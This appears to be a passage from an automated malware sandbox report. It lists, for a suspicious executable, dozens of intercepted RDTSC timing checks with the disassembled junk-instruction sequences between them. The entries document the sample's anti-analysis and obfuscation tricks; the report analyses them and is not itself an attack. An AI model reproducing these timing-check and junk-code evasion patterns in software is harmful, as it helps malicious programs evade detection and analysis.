    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8EFD second address: 8E8F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8F03 second address: 8E8F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8F07 second address: 8E8F30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4E5A4CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2CB4E5A4D6h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EDF28 second address: 8EDF30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EDF30 second address: 8EDF4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CB4E5A4D1h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EDF4C second address: 8EDF65 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2CB4F07456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jc 00007F2CB4F07456h 0x00000011 jbe 00007F2CB4F07456h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EE0B5 second address: 8EE0E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CB4E5A4CFh 0x00000009 jmp 00007F2CB4E5A4D8h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EE0E5 second address: 8EE0EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EE0EB second address: 8EE0EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EE381 second address: 8EE387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EE387 second address: 8EE38D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EE503 second address: 8EE50D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F2CB4F07456h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EE50D second address: 8EE51E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2CB4E5A4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EE51E second address: 8EE528 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2CB4F07456h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EDAF4 second address: 8EDAF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F4281 second address: 8F4285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F4285 second address: 8F428B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F428B second address: 8F42AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2CB4F07469h 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B8BAE second address: 8B8BB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B8BB4 second address: 8B8BB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9087 second address: 8B908D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B908D second address: 8B9097 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2CB4F0745Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9097 second address: 8B90A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B90A3 second address: 8B90AC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B91C1 second address: 8B91E7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007F2CB4E5A4C6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2CB4E5A4D4h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B91E7 second address: 8B91ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B91ED second address: 8B91F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9318 second address: 8B9321 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B93AE second address: 8B93B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B93B2 second address: 8B93C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jng 00007F2CB4F07460h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B93C6 second address: 8B941A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, esi 0x00000006 push 00000000h 0x00000008 push edx 0x00000009 call 00007F2CB4E5A4C8h 0x0000000e pop edx 0x0000000f mov dword ptr [esp+04h], edx 0x00000013 add dword ptr [esp+04h], 00000015h 0x0000001b inc edx 0x0000001c push edx 0x0000001d ret 0x0000001e pop edx 0x0000001f ret 0x00000020 push eax 0x00000021 adc edx, 3EB1D429h 0x00000027 pop edx 0x00000028 nop 0x00000029 push edi 0x0000002a jmp 00007F2CB4E5A4D7h 0x0000002f pop edi 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jbe 00007F2CB4E5A4CCh 0x00000039 jp 00007F2CB4E5A4C6h 0x0000003f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B941A second address: 8B9420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9420 second address: 8B9424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B96A6 second address: 8B96AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B96AA second address: 8B96BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9DE4 second address: 8B9E05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F2CB4F0745Dh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007F2CB4F07456h 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9E05 second address: 8B9E37 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F2CB4E5A4CCh 0x0000000c jbe 00007F2CB4E5A4C6h 0x00000012 popad 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jmp 00007F2CB4E5A4D3h 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 push esi 0x00000021 push esi 0x00000022 pop esi 0x00000023 pop esi 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9F70 second address: 8B9FA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4F07465h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jng 00007F2CB4F07473h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2CB4F07461h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F3415 second address: 8F3442 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4E5A4CAh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2CB4E5A4CAh 0x0000000e jmp 00007F2CB4E5A4D5h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F35B6 second address: 8F35C3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2CB4F07458h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F3711 second address: 8F3715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F3B53 second address: 8F3B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 jng 00007F2CB4F07456h 0x0000000e popad 0x0000000f jmp 00007F2CB4F07461h 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F2CB4F07462h 0x0000001c je 00007F2CB4F07456h 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F3B8E second address: 8F3B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F3B92 second address: 8F3B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6517 second address: 8F651B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F651B second address: 8F653D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F2CB4F07462h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86CB81 second address: 86CBAD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2CB4E5A4C6h 0x00000008 jmp 00007F2CB4E5A4D3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2CB4E5A4CDh 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F626E second address: 8F6277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7AE5 second address: 8F7AF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jno 00007F2CB4E5A4C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7AF1 second address: 8F7B1E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2CB4F0745Fh 0x0000000d jmp 00007F2CB4F07466h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86962A second address: 869639 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jc 00007F2CB4E5A4C6h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FA7FC second address: 8FA80C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F2CB4F0745Ah 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FA80C second address: 8FA810 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FA067 second address: 8FA079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushad 0x00000006 popad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F2CB4F07456h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FA079 second address: 8FA07D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FA201 second address: 8FA207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FA207 second address: 8FA20B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FA4E1 second address: 8FA4E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FFD56 second address: 8FFD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jl 00007F2CB4E5A4C6h 0x0000000c popad 0x0000000d jmp 00007F2CB4E5A4D8h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B98F6 second address: 8B9980 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2CB4F07458h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D33F5h], ebx 0x00000011 mov ebx, dword ptr [ebp+1248881Bh] 0x00000017 pushad 0x00000018 add cx, 2E92h 0x0000001d mov ecx, esi 0x0000001f popad 0x00000020 mov ecx, dword ptr [ebp+122D3759h] 0x00000026 add eax, ebx 0x00000028 jne 00007F2CB4F07457h 0x0000002e push eax 0x0000002f pushad 0x00000030 push esi 0x00000031 jnc 00007F2CB4F07456h 0x00000037 pop esi 0x00000038 push ebx 0x00000039 jmp 00007F2CB4F07460h 0x0000003e pop ebx 0x0000003f popad 0x00000040 mov dword ptr [esp], eax 0x00000043 push 00000000h 0x00000045 push esi 0x00000046 call 00007F2CB4F07458h 0x0000004b pop esi 0x0000004c mov dword ptr [esp+04h], esi 0x00000050 add dword ptr [esp+04h], 00000018h 0x00000058 inc esi 0x00000059 push esi 0x0000005a ret 0x0000005b pop esi 0x0000005c ret 0x0000005d push 00000004h 0x0000005f mov dword ptr [ebp+122D1CBEh], ebx 0x00000065 nop 0x00000066 ja 00007F2CB4F0745Ah 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f pushad 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9980 second address: 8B9987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 903C38 second address: 903C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 903C46 second address: 903C4B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9032A5 second address: 9032CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2CB4F0745Ch 0x0000000c jmp 00007F2CB4F07466h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9032CE second address: 9032D4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9032D4 second address: 9032F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2CB4F07463h 0x00000009 je 00007F2CB4F07456h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906D42 second address: 906D5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4E5A4D4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906D5A second address: 906D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906D68 second address: 906D6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906D6C second address: 906D70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 907009 second address: 90700F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90747C second address: 907482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9075BD second address: 9075C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9075C1 second address: 9075D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4F0745Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9075D8 second address: 907601 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2CB4E5A4C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jne 00007F2CB4E5A4C6h 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F2CB4E5A4D1h 0x0000001c popad 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 907601 second address: 90760C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90760C second address: 907617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F65F second address: 90F698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CB4F07464h 0x00000009 pop ecx 0x0000000a push edi 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2CB4F07469h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DB4A second address: 90DB4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DB4E second address: 90DB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F2CB4F07456h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DB5E second address: 90DB62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90EBCB second address: 90EBCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9140D4 second address: 9140D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9140D8 second address: 9140DE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 913272 second address: 913278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 913278 second address: 91327C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9133D7 second address: 9133E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9133E3 second address: 9133E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9133E7 second address: 9133EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 913541 second address: 913551 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2CB4F07456h 0x00000008 jng 00007F2CB4F07456h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91368E second address: 913697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 913697 second address: 91369D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9137E7 second address: 91381D instructions: 0x00000000 rdtsc 0x00000002 je 00007F2CB4E5A4C6h 0x00000008 jmp 00007F2CB4E5A4D7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 js 00007F2CB4E5A4C6h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b popad 0x0000001c push edx 0x0000001d jbe 00007F2CB4E5A4C6h 0x00000023 pop edx 0x00000024 rdtsc
